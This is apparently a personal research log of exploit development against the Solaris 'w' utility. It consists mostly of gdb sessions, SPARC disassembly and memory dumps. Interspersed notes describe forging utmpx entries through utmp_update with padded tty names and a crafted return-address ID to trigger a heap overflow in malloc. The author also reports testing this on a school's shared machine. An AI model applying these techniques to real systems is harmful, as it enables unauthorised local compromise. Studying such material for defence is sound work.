        0xff370000 0xff371fff     0x2000          0 ----rwx
        0xff3a0000 0xff3a5fff     0x6000          0 ----rwx
        0xff3b0000 0xff3ddfff    0x2e000          0 ----r-x
        0xff3ee000 0xff3effff     0x2000    0x2e000 ----rwx
        0xff3f0000 0xff3f1fff     0x2000          0 ----rwx
        0xffbfe000 0xffbfffff     0x2000          0 -s--rwx

(gdb) r `perl -e 'print "A"x1000000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/blade72/w_32 `perl -e 'print "A"x1000000'`
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x00010ec8 in main ()
(gdb) info proc map
process 2223 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_MSACCT Microstate accounting enabled
PR_PCOMPAT Micro-state accounting inherited on fork
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap

Mapped address spaces:

        Start Addr   End Addr       Size     Offset   Flags
           0x10000    0x13fff     0x4000          0 ----r-x
           0x22000    0x23fff     0x2000     0x2000 ----rwx
           0x24000    0x2ffff     0xc000          0 --b-rwx
        0xff280000 0xff357fff    0xd8000          0 ----r-x
        0xff368000 0xff36ffff     0x8000    0xd8000 ----rwx
        0xff370000 0xff371fff     0x2000          0 ----rwx
        0xff3a0000 0xff3a5fff     0x6000          0 ----rwx
        0xff3b0000 0xff3ddfff    0x2e000          0 ----r-x
        0xff3ee000 0xff3effff     0x2000    0x2e000 ----rwx
        0xff3f0000 0xff3f1fff     0x2000          0 ----rwx
        0xffb0a000 0xffbfffff    0xf6000          0 -s--rwx

(gdb)

Raw dissection of malloc – Pt. 10

Sorry this section and possibly others are not ordered properly.. It is raw research slate.

Here is why ut_line parsing is important.. The test has lots of requirements to satisfy.. must be in /dev/ directory.. we have to be able to open the file and that file must be a tty.. Normally, we shouldn’t be able to re-use our tty name (ie. pts/1), but we can! by doing tricks like pts//1 pts///1 we can create new utmpx entries with the correct access rights. Note: “..” cannot be used in the path name..
Thus, the ut_line[32] – strlen (“ptsN”) = 27 slashes.. beautiful..
Note 2: The same ut_line can be used for an entry with a different ID, at least for DEAD PROCESSES (seriously, fuck USER_PROCESS’S) . In fact, whole entries can be replicated merily by changing the ID.. but 0x0A must not be present in final byte of the ID, because it is the same as the byte not being there, meaning it will match the entry if it exists of the first 3 bytes in the ID..

Here’s a cool snippet of me hacking the utmp_update command:
Note: utmp_update is smart enough to disallow you from modifying a USER_PROCESS (7) entry for a different user name than your own.. You can, however, add DEAD_PROCESS entries for any username, including “TREE” structure usernames ;)

-bash-3.00$ /usr/lib/utmp_update "bazz" `perl -e 'print "\xff\xbe\xef\x08" '` "pts/////////2" "9000" "7" "10" "1" "100000" "10000" "4" "aa" "4" "bazz"
-bash-3.00$ w
 11:31pm  up  9:26,  2 users,  load average: 0.02, 0.02, 0.01
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/2         5:03pm            5         w
bazz     pts/3         5:06pm     9     31         -bash
bazz     pts/////////  1Jan70
-bash-3.00$

Although the return address is the “ID” field of struct utmpx, it can be “uniq” in that with NOP sled we can always change it in order to get back to the tail entry of UTMPX file.

OK and I have just confirmed exploitability is persistent across my Solaris 10 box to the school’s Blade72 box.. :D Great!

Well if I upload the chunk before endutxent() as used | 0x09, it will work.. ? Yes.. I took note of the former value there having it’s LSb set, so I copied that trend and am on to awesomeville.

(gdb) set *0x31488 = 0x41414109
(gdb) c
Continuing.

Breakpoint 10, 0x00011114 in main ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2d4810 in realfree () from /lib/libc.so.1
(gdb)

OMG THAT WORKED!!! <3 Something happens in endutxent(), whereis I can't seem to cause heap overflow BEFORE the call, but i can AFTER.. hmm...

(gdb) r
Starting program: /home/bazz/blade72/w_32 -h foo
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 8, 0x0001110c in main ()
(gdb) x/14i $pc
0x1110c <main+584>:     call  0x22508 <endutxent@plt>
0x11110 <main+588>:     nop
0x11114 <main+592>:     sethi  %hi(0x22800), %o0
0x11118 <main+596>:     mov  %i4, %l1
0x1111c <main+600>:     add  %o0, 0x1e8, %i0
0x11120 <main+604>:     call  0x22514 <time@plt>
0x11124 <main+608>:     mov  %i0, %o0
0x11128 <main+612>:     sethi  %hi(0x22400), %g2
0x1112c <main+616>:
    ld  [ %g2 + 0x360 ], %g2    ! 0x22760 <_etext+127640>
0x11130 <main+620>:     cmp  %g2, 0
0x11134 <main+624>:     be  0x113c8 <main+1284>
0x11138 <main+628>:     sethi  %hi(0x12000), %g2
0x1113c <main+632>:     call  0x11e80 <_etext+59832>
0x11140 <main+636>:     mov  %i0, %o0
(gdb) x/x 0x31484
0x31484:        0x00000000
(gdb)
0x31488:        0x00002009
(gdb)
0x3148c:        0x00000000
(gdb) set *0x31488 = 0x41414100
(gdb) c
Continuing.

Program exited normally.
(gdb) b *0x11114
Breakpoint 10 at 0x11114
(gdb) r
Starting program: /home/bazz/blade72/w_32 -h foo
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 8, 0x0001110c in main ()
(gdb) c
Continuing.

Breakpoint 10, 0x00011114 in main ()
(gdb) set *0x31488 = 0x41414100
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2d4810 in realfree () from /lib/libc.so.1
(gdb)

MAKE SURE 8-byte-aligned :O To ensure 8-byte alignment.. We need to count the UTMPX entries up ourselves..

(gdb) x/x $o0 + 0xd14
0x31484:        0x00000000
(gdb) x/x $o0 + 0xd18
0x31488:        0x000004c0
(gdb)

That’s OK, we can account for this by putting several “RETURN ADDRESSES”

This is because malloc is behaving, or something is different on systems at school… I see where I was getting tripped up. For some reason, it seems that UTMPX entries are showing up in HEAP space AFTER our malloc’d space.. weird… but just stay true to the ol’ adage: Chunk size = malloc’d return + size..

good breakpoints.. get the malloc return val.. but this is really just the size of /var/adm/utmpx..
it’s the return value we want.. then add it to get the address of the chunk size.

(gdb) i b
Num Type           Disp Enb Address    What
1   breakpoint     keep y   0x00011114 <main+592>
6   breakpoint     keep y   0x000110ac <main+488>
        breakpoint already hit 1 time
7   breakpoint     keep y   0x000110b4 <main+496>
        breakpoint already hit 1 time
(gdb)

While I should throw in my raw dissection of malloc to a point… Let me do that.. just a second…

I literally have no idea how I figured it out

bazz@AwesomeSauce[~] sshBlade72
This shell is interactive
bazz@blade72[pts/3][~] ./w_32
  7:34pm  up 595 day(s),  5:44,  3 users,  load average: 0.00, 0.01, 0.01
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    22                /home/bazz/w_32
bazz     pts/2         7:23pm                      /home/bazz/w_32
bazz     pts/3         7:34pm                      ./w_32
bazz@blade72[pts/3][~] ./w_32 -h
bazz     pts/1         5:10pm    22                /home/bazz/w_32
bazz     pts/2         7:23pm                      /home/bazz/w_32
bazz     pts/3         7:34pm                      ./w_32 -h
bazz@blade72[pts/3][~] gdb ./w_32
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...(no debugging symbols found)...
/home/bazz/.gdb: No such file or directory.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...  7:34pm  up 595 day(s),  5:44,  3 users,  load average: 0.00, 0.01, 0.01
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    22                /home/bazz/w_32
bazz     pts/2         7:23pm                      /home/bazz/w_32
bazz     pts/3         7:34pm                      /home/bazz/w_32

Program exited normally.
(gdb) disas main
Dump of assembler code for function main:
0x10ec4 <main>: save  %sp, -1992, %sp
0x10ec8 <main+4>:       sethi  %hi(0x12000), %g2
0x10ecc <main+8>:       mov  %i0, %i3
0x10ed0 <main+12>:      add  %g2, 0x194, %o1
0x10ed4 <main+16>:      call  0x22490 <setlocale>
0x10ed8 <main+20>:      mov  6, %o0
0x10edc <main+24>:      sethi  %hi(0x12000), %g2
0x10ee0 <main+28>:      call  0x2249c <textdomain>
0x10ee4 <main+32>:      add  %g2, 0x198, %o0    ! 0x12198 <_lib_version+8>
0x10ee8 <main+36>:      ld  [ %i1 ], %g2
0x10eec <main+40>:      ldsb  [ %g2 ], %g2
0x10ef0 <main+44>:      cmp  %g2, 0x2d
0x10ef4 <main+48>:      mov  1, %g2
0x10ef8 <main+52>:      be  0x10f04 <main+64>
0x10efc <main+56>:      sethi  %hi(0x22800), %l0
0x10f00 <main+60>:      clr  %g2
0x10f04 <main+64>:      ld  [ %i1 ], %o0
0x10f08 <main+68>:      st  %g2, [ %l0 + 0x1ec ]
0x10f0c <main+72>:      call  0x224a8 <strrchr>
0x10f10 <main+76>:      mov  0x2f, %o1
0x10f14 <main+80>:      ld  [ %l0 + 0x1ec ], %g2
0x10f18 <main+84>:      cmp  %g2, 0
0x10f1c <main+88>:      be  0x10f34 <main+112>
0x10f20 <main+92>:      orcc  %g0, %o0, %o0
0x10f24 <main+96>:      ld  [ %i1 ], %g2
0x10f28 <main+100>:     ldsb  [ %g2 + 1 ], %o0
0x10f2c <main+104>:     b  0x10f54 <main+144>
0x10f30 <main+108>:     sethi  %hi(0x22800), %g2
0x10f34 <main+112>:     bne  0x10f4c <main+136>
0x10f38 <main+116>:     nop
0x10f3c <main+120>:     ld  [ %i1 ], %g2
0x10f40 <main+124>:     ldsb  [ %g2 ], %o0
---Type <return> to continue, or q <return> to quit---
0x10f44 <main+128>:     b  0x10f54 <main+144>
0x10f48 <main+132>:     sethi  %hi(0x22800), %g2
0x10f4c <main+136>:     ldsb  [ %o0 + 1 ], %o0
0x10f50 <main+140>:     sethi  %hi(0x22800), %g2
0x10f54 <main+144>:     stb  %o0, [ %g2 + 0x1f0 ]       ! 0x229f0 <_edata+566>
0x10f58 <main+148>:     sethi  %hi(0x22800), %g3
0x10f5c <main+152>:     cmp  %i0, 1
0x10f60 <main+156>:     ld  [ %i1 ], %g2
0x10f64 <main+160>:     st  %g2, [ %g3 + 0x1f8 ]
0x10f68 <main+164>:     ble  0x11070 <main+428>
0x10f6c <main+168>:     sethi  %hi(0x12000), %g2
0x10f70 <main+172>:     ld  [ %i1 + 4 ], %o1
0x10f74 <main+176>:     sethi  %hi(0x2f400), %g2
0x10f78 <main+180>:     add  %g2, 0x201, %i0    ! 0x2f601 <_ctype+1>
0x10f7c <main+184>:     ldsb  [ %o1 ], %o0
0x10f80 <main+188>:     cmp  %o0, 0x2d
0x10f84 <main+192>:     bne,a   0x11040 <main+380>
0x10f88 <main+196>:     ldub  [ %o0 + %i0 ], %g2
0x10f8c <main+200>:     ldsb  [ %o1 + 1 ], %o0
0x10f90 <main+204>:     cmp  %o0, 0
0x10f94 <main+208>:     be  0x11058 <main+404>
0x10f98 <main+212>:     mov  1, %i2
0x10f9c <main+216>:     cmp  %o0, 0x75
0x10fa0 <main+220>:     bge  0x10fc8 <main+260>
0x10fa4 <main+224>:     cmp  %o0, 0x68
0x10fa8 <main+228>:     be  0x10fe4 <main+288>
0x10fac <main+232>:     cmp  %o0, 0x6c
0x10fb0 <main+236>:     be  0x10ff4 <main+304>
0x10fb4 <main+240>:     cmp  %o0, 0x73
0x10fb8 <main+244>:     be,a   0x1100c <main+328>
0x10fbc <main+248>:     sethi  %hi(0x22400), %g2
0x10fc0 <main+252>:     b  0x11910 <main+2636>
0x10fc4 <main+256>:     sethi  %hi(0x12000), %g2
---Type <return> to continue, or q <return> to quit---
0x10fc8 <main+260>:     cmp  %o0, 0x75
0x10fcc <main+264>:     be  0x11018 <main+340>
0x10fd0 <main+268>:     cmp  %o0, 0x77
0x10fd4 <main+272>:     be,a   0x1101c <main+344>
0x10fd8 <main+276>:     sethi  %hi(0x22800), %g2
0x10fdc <main+280>:     b  0x11910 <main+2636>
0x10fe0 <main+284>:     sethi  %hi(0x12000), %g2
0x10fe4 <main+288>:     sethi  %hi(0x22400), %g2
0x10fe8 <main+292>:     clr  [ %g2 + 0x360 ]    ! 0x22760 <___Argv+4>
0x10fec <main+296>:     b  0x11024 <main+352>
0x10ff0 <main+300>:     inc  %i2
0x10ff4 <main+304>:     sethi  %hi(0x22400), %g2
0x10ff8 <main+308>:     ld  [ %g2 + 0x364 ], %g3        ! 0x22764 <___Argv+8>
0x10ffc <main+312>:     inc  %g3
0x11000 <main+316>:     st  %g3, [ %g2 + 0x364 ]
0x11004 <main+320>:     b  0x11024 <main+352>
0x11008 <main+324>:     inc  %i2
0x1100c <main+328>:     clr  [ %g2 + 0x364 ]
0x11010 <main+332>:     b  0x11024 <main+352>
0x11014 <main+336>:     inc  %i2
0x11018 <main+340>:     sethi  %hi(0x22800), %g2
0x1101c <main+344>:     stb  %o0, [ %g2 + 0x1f0 ]       ! 0x229f0 <_edata+566>
0x11020 <main+348>:     inc  %i2
0x11024 <main+352>:     ld  [ %i1 + 4 ], %g2
0x11028 <main+356>:     ldsb  [ %g2 + %i2 ], %o0
0x1102c <main+360>:     cmp  %o0, 0
0x11030 <main+364>:     bne  0x10fa0 <main+220>
0x11034 <main+368>:     cmp  %o0, 0x75
0x11038 <main+372>:     b  0x1105c <main+408>
0x1103c <main+376>:     dec  %i3
0x11040 <main+380>:     btst  7, %g2
0x11044 <main+384>:     be  0x11944 <main+2688>
0x11048 <main+388>:     cmp  %i3, 2
---Type <return> to continue, or q <return> to quit---
0x1104c <main+392>:     bg  0x11944 <main+2688>
0x11050 <main+396>:     sethi  %hi(0x22800), %g2
0x11054 <main+400>:     st  %o1, [ %g2 + 0x1f4 ]        ! 0x229f4 <_edata+570>
0x11058 <main+404>:     dec  %i3
0x1105c <main+408>:     add  %i1, 4, %i1
0x11060 <main+412>:     cmp  %i3, 1
0x11064 <main+416>:     bg,a   0x10f7c <main+184>
0x11068 <main+420>:     ld  [ %i1 + 4 ], %o1
0x1106c <main+424>:     sethi  %hi(0x12000), %g2
0x11070 <main+428>:     add  %g2, 0x1dc, %o0    ! 0x121dc <_lib_version+76>
0x11074 <main+432>:     call  0x224b4 <stat>
0x11078 <main+436>:     add  %fp, -136, %o1
0x1107c <main+440>:     cmp  %o0, -1
0x11080 <main+444>:     be  0x1196c <main+2728>
0x11084 <main+448>:     ld  [ %fp + -88 ], %o0
0x11088 <main+452>:     sethi  %hi(0xb02c0800), %g2
0x1108c <main+456>:     call  0x224c0 <.umul>
0x11090 <main+460>:     add  %g2, 0x303, %o1    ! 0xb02c0b03
0x11094 <main+464>:     srl  %o1, 8, %g2
0x11098 <main+468>:     sll  %g2, 5, %g3
0x1109c <main+472>:     sub  %g3, %g2, %g2
0x110a0 <main+476>:     sll  %g2, 2, %g3
0x110a4 <main+480>:     sub  %g3, %g2, %g2
0x110a8 <main+484>:     sll  %g2, 2, %i1
0x110ac <main+488>:     call  0x224cc <malloc>
0x110b0 <main+492>:     mov  %i1, %o0
0x110b4 <main+496>:     orcc  %g0, %o0, %i0
0x110b8 <main+500>:     be  0x119bc <main+2808>
0x110bc <main+504>:     mov  %o0, %i3
0x110c0 <main+508>:     sethi  %hi(0x12000), %g2
0x110c4 <main+512>:     call  0x224d8 <utmpxname>
0x110c8 <main+516>:     add  %g2, 0x224, %o0    ! 0x12224 <_lib_version+148>
0x110cc <main+520>:     call  0x224e4 <setutxent>
---Type <return> to continue, or q <return> to quit---
0x110d0 <main+524>:     add  %i0, %i1, %i2
0x110d4 <main+528>:     call  0x224f0 <getutxent>
0x110d8 <main+532>:     nop
0x110dc <main+536>:     orcc  %g0, %o0, %o1
0x110e0 <main+540>:     mov  %i0, %i4
0x110e4 <main+544>:     be  0x1110c <main+584>
0x110e8 <main+548>:     mov  %i3, %o0
0x110ec <main+552>:     call  0x224fc <memcpy>
0x110f0 <main+556>:     mov  0x174, %o2
0x110f4 <main+560>:     call  0x224f0 <getutxent>
0x110f8 <main+564>:     nop
0x110fc <main+568>:     orcc  %g0, %o0, %o1
0x11100 <main+572>:     add  %i3, 0x174, %i3
0x11104 <main+576>:     bne  0x110ec <main+552>
0x11108 <main+580>:     mov  %i3, %o0
0x1110c <main+584>:     call  0x22508 <endutxent>
0x11110 <main+588>:     nop
0x11114 <main+592>:     sethi  %hi(0x22800), %o0
0x11118 <main+596>:     mov  %i4, %l1
0x1111c <main+600>:     add  %o0, 0x1e8, %i0
0x11120 <main+604>:     call  0x22514 <time>
0x11124 <main+608>:     mov  %i0, %o0
0x11128 <main+612>:     sethi  %hi(0x22400), %g2
0x1112c <main+616>:     ld  [ %g2 + 0x360 ], %g2        ! 0x22760 <___Argv+4>
0x11130 <main+620>:     cmp  %g2, 0
0x11134 <main+624>:     be  0x113c8 <main+1284>
0x11138 <main+628>:     sethi  %hi(0x12000), %g2
0x1113c <main+632>:     call  0x11e80 <main+4028>
0x11140 <main+636>:     mov  %i0, %o0
0x11144 <main+640>:     cmp  %i4, %i2
0x11148 <main+644>:     bcc  0x112f4 <main+1072>
0x1114c <main+648>:     sethi  %hi(0x22800), %i0
0x11150 <main+652>:     ldsh  [ %l1 + 0x48 ], %o0
---Type <return> to continue, or q <return> to quit---
0x11154 <main+656>:     sethi  %hi(0x15000), %g2
0x11158 <main+660>:     add  %g2, 0x180, %i5    ! 0x15180
0x1115c <main+664>:     cmp  %o0, 7
0x11160 <main+668>:     bne  0x11190 <main+716>
0x11164 <main+672>:     cmp  %o0, 2
0x11168 <main+676>:     ldsh  [ %l1 + 0x4c ], %g2
0x1116c <main+680>:     cmp  %g2, 2
0x11170 <main+684>:     be,a   0x112e4 <main+1056>
0x11174 <main+688>:     add  %l1, 0x174, %l1
0x11178 <main+692>:     sethi  %hi(0x22800), %g2
0x1117c <main+696>:     ld  [ %g2 + 0x1e0 ], %g3        ! 0x229e0 <_edata+550>
0x11180 <main+700>:     inc  %g3
0x11184 <main+704>:     st  %g3, [ %g2 + 0x1e0 ]
0x11188 <main+708>:     b  0x112e4 <main+1056>
0x1118c <main+712>:     add  %l1, 0x174, %l1
0x11190 <main+716>:     bne,a   0x112e4 <main+1056>
0x11194 <main+720>:     add  %l1, 0x174, %l1
0x11198 <main+724>:     sethi  %hi(0x22800), %g2
0x1119c <main+728>:     ld  [ %l1 + 0x50 ], %g3
0x111a0 <main+732>:     ld  [ %g2 + 0x1e8 ], %g2
0x111a4 <main+736>:     sub  %g2, %g3, %g2
0x111a8 <main+740>:     add  %g2, 0x1e, %l0
0x111ac <main+744>:     mov  %l0, %o0
0x111b0 <main+748>:     call  0x22520 <.div>
0x111b4 <main+752>:     mov  %i5, %o1
0x111b8 <main+756>:     sll  %o0, 4, %g2
0x111bc <main+760>:     mov  %o0, %i3
0x111c0 <main+764>:     add  %g2, %o0, %g2
0x111c4 <main+768>:     sll  %g2, 3, %g2
0x111c8 <main+772>:     sub  %g2, %o0, %g2
0x111cc <main+776>:     sll  %g2, 2, %g3
0x111d0 <main+780>:     add  %g3, %g2, %g2
0x111d4 <main+784>:     sll  %g2, 7, %g2
---Type <return> to continue, or q <return> to quit---
0x111d8 <main+788>:     sub  %l0, %g2, %l0
0x111dc <main+792>:     sethi  %hi(0x91a2b000), %g2
0x111e0 <main+796>:     mov  %l0, %o0
0x111e4 <main+800>:     call  0x2252c <.mul>
0x111e8 <main+804>:     add  %g2, 0x3c5, %o1
0x111ec <main+808>:     add  %l0, %o1, %g2
0x111f0 <main+812>:     sra  %l0, 0x1f, %g3
0x111f4 <main+816>:     sra  %g2, 0xb, %g2
0x111f8 <main+820>:     sub  %g2, %g3, %i1
0x111fc <main+824>:     sll  %i1, 3, %g2
0x11200 <main+828>:     sub  %g2, %i1, %g2
0x11204 <main+832>:     sll  %g2, 5, %g2
0x11208 <main+836>:     add  %i1, %g2, %g2
0x1120c <main+840>:     sll  %g2, 4, %g2
0x11210 <main+844>:     sub  %l0, %g2, %l0
0x11214 <main+848>:     sethi  %hi(0x88888800), %g2
0x11218 <main+852>:     mov  %l0, %o0
0x1121c <main+856>:     call  0x2252c <.mul>
0x11220 <main+860>:     add  %g2, 0x89, %o1
0x11224 <main+864>:     add  %l0, %o1, %g2
0x11228 <main+868>:     sra  %g2, 5, %g2
0x1122c <main+872>:     sra  %l0, 0x1f, %g3
0x11230 <main+876>:     sub  %g2, %g3, %i0
0x11234 <main+880>:     sethi  %hi(0x22800), %g2
0x11238 <main+884>:     st  %l0, [ %g2 + 0x1e4 ]        ! 0x229e4 <_edata+554>
0x1123c <main+888>:     sethi  %hi(0x12000), %g2
0x11240 <main+892>:     call  0x22538 <gettext>
0x11244 <main+896>:     add  %g2, 0x234, %o0    ! 0x12234 <_lib_version+164>
0x11248 <main+900>:     call  0x22544 <printf>
0x1124c <main+904>:     nop
0x11250 <main+908>:     cmp  %i3, 0
0x11254 <main+912>:     ble  0x11274 <main+944>
0x11258 <main+916>:     cmp  %i1, 0
---Type <return> to continue, or q <return> to quit---
0x1125c <main+920>:     sethi  %hi(0x12000), %g2
0x11260 <main+924>:     call  0x22538 <gettext>
0x11264 <main+928>:     add  %g2, 0x23c, %o0    ! 0x1223c <_lib_version+172>
0x11268 <main+932>:     call  0x22544 <printf>
0x1126c <main+936>:     mov  %i3, %o1
0x11270 <main+940>:     cmp  %i1, 0
0x11274 <main+944>:     ble  0x112a0 <main+988>
0x11278 <main+948>:     cmp  %i0, 0
0x1127c <main+952>:     sethi  %hi(0x12000), %g2
0x11280 <main+956>:     ble  0x112a4 <main+992>
0x11284 <main+960>:     cmp  %i1, 0
0x11288 <main+964>:     add  %g2, 0x248, %o0
0x1128c <main+968>:     mov  %i1, %o1
0x11290 <main+972>:     call  0x22544 <printf>
0x11294 <main+976>:     mov  %i0, %o2
0x11298 <main+980>:     b  0x112e4 <main+1056>
0x1129c <main+984>:     add  %l1, 0x174, %l1
0x112a0 <main+988>:     cmp  %i1, 0
0x112a4 <main+992>:     ble  0x112c4 <main+1024>
0x112a8 <main+996>:     cmp  %i0, 0
0x112ac <main+1000>:    sethi  %hi(0x12000), %g2
0x112b0 <main+1004>:    call  0x22538 <gettext>
0x112b4 <main+1008>:    add  %g2, 0x254, %o0    ! 0x12254 <_lib_version+196>
0x112b8 <main+1012>:    call  0x22544 <printf>
0x112bc <main+1016>:    mov  %i1, %o1
0x112c0 <main+1020>:    cmp  %i0, 0
0x112c4 <main+1024>:    ble,a   0x112e4 <main+1056>
0x112c8 <main+1028>:    add  %l1, 0x174, %l1
0x112cc <main+1032>:    sethi  %hi(0x12000), %g2
0x112d0 <main+1036>:    call  0x22538 <gettext>
0x112d4 <main+1040>:    add  %g2, 0x260, %o0    ! 0x12260 <_lib_version+208>
0x112d8 <main+1044>:    call  0x22544 <printf>
0x112dc <main+1048>:    mov  %i0, %o1
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r -h
Starting program: /home/bazz/w_32 -h
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/96x 0x23000
0x23000 <_edata+2118>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23010 <_edata+2134>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23020 <_edata+2150>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23030 <_edata+2166>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23040 <_edata+2182>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23050 <_edata+2198>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23060 <_edata+2214>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23070 <_edata+2230>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23080 <_edata+2246>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23090 <_edata+2262>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230a0 <_edata+2278>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230b0 <_edata+2294>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230c0 <_edata+2310>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230d0 <_edata+2326>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230e0 <_edata+2342>:  0x00000000      0x00000000      0x00000000      0x00000000
0x230f0 <_edata+2358>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23100 <_edata+2374>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23110 <_edata+2390>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23120 <_edata+2406>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23130 <_edata+2422>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23140 <_edata+2438>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23150 <_edata+2454>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23160 <_edata+2470>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23170 <_edata+2486>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23180 <_edata+2502>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23190 <_edata+2518>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231a0 <_edata+2534>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231b0 <_edata+2550>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231c0 <_edata+2566>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231d0 <_edata+2582>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231e0 <_edata+2598>:  0x00000000      0x00000000      0x00000000      0x00000000
0x231f0 <_edata+2614>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23200 <_edata+2630>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23210 <_edata+2646>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23220 <_edata+2662>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23230 <_edata+2678>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23240 <_edata+2694>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23250 <_edata+2710>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23260 <_edata+2726>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23270 <_edata+2742>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23280 <_edata+2758>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23290 <_edata+2774>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232a0 <_edata+2790>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232b0 <_edata+2806>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232c0 <_edata+2822>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232d0 <_edata+2838>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232e0 <_edata+2854>:  0x00000000      0x00000000      0x00000000      0x00000000
0x232f0 <_edata+2870>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23300 <_edata+2886>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23310 <_edata+2902>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23320 <_edata+2918>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23330 <_edata+2934>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23340 <_edata+2950>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23350 <_edata+2966>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23360 <_edata+2982>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23370 <_edata+2998>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23380 <_edata+3014>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23390 <_edata+3030>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233a0 <_edata+3046>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233b0 <_edata+3062>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233c0 <_edata+3078>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233d0 <_edata+3094>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233e0 <_edata+3110>:  0x00000000      0x00000000      0x00000000      0x00000000
0x233f0 <_edata+3126>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23400 <_edata+3142>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23410 <_edata+3158>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23420 <_edata+3174>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23430 <_edata+3190>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23440 <_edata+3206>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23450 <_edata+3222>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23460 <_edata+3238>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23470 <_edata+3254>:  0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x23480 <_edata+3270>:  0x00000000      0x00000000      0x00000000      0x00000000
0x23490 <_edata+3286>:  0x00000000      0x00000000      0x00000000      0x00000000
0x234a0 <_edata+3302>:  0x00000000      0x00000000      0x00000000      0x00000000
0x234b0 <_edata+3318>:  0x00000000      0x00000000      0x00000000      0x00000000
0x234c0 <_edata+3334>:  0x00000000      0x00000000      0x00000000      0x00000000
0x234d0 <_edata+3350>:  0x00000000      0x00000000      0x00000000      0x00000000
0x234e0 <_edata+3366>:  0x00000000      0x00000000      0x00000000      0x00000000
